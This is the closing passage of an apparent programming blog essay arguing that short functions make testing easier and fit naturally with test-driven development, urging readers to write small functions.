Of all of the advantages of writing small functions, the most profound is probably how easy it makes testing. Without short functions, testing can be completely overwhelming and is likely to be resisted or delayed to the detriment of the project. With short functions, tests practically write themselves, and if TDD (Test-Driven Development) is practiced, short functions tend to be the natural result of the tests that are written first.

Making testing easier should motivate you to write smaller functions all by itself. Making code easier to read, write, change, and document as well is even better. It took a long time to appreciate how beneficial it is to program this way because I couldn't get over the friction of creating all of those little functions. Try it. Write those short and sweet functions. It will free your mind.

Discuss this article on Hacker News.

Eigenstate.org::The home of Ori Bernstein on the Web.

Apparently It’s OK For iOS Apps To Ask For Your Apple ID And Password – Marco.org
